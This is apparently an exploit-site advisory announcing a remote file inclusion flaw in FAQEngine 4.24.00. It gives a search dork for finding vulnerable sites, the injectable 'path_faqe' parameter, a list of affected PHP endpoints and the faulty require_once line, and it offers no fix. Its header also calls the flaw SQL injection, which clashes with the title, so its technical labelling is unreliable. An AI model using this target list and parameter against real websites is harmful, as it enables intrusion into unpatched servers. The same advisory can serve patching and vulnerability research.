Exploit for unknown platform in category web applications
=======================================================
FAQEngine 4.24.00 - Remote File Inclusion vulnerability
=======================================================
###################################################################################
[ Software Information ]
[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -
[+] Location : INDONESIA - JOGJA
##################################################################################
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]
etc etc etc .. too much ..
[ ERROR IN ]
require_once($path_faqe."/includes/global.inc.php");
[ FIX ]
dunno .. :P~~
# 0day.today [2018-01-06] #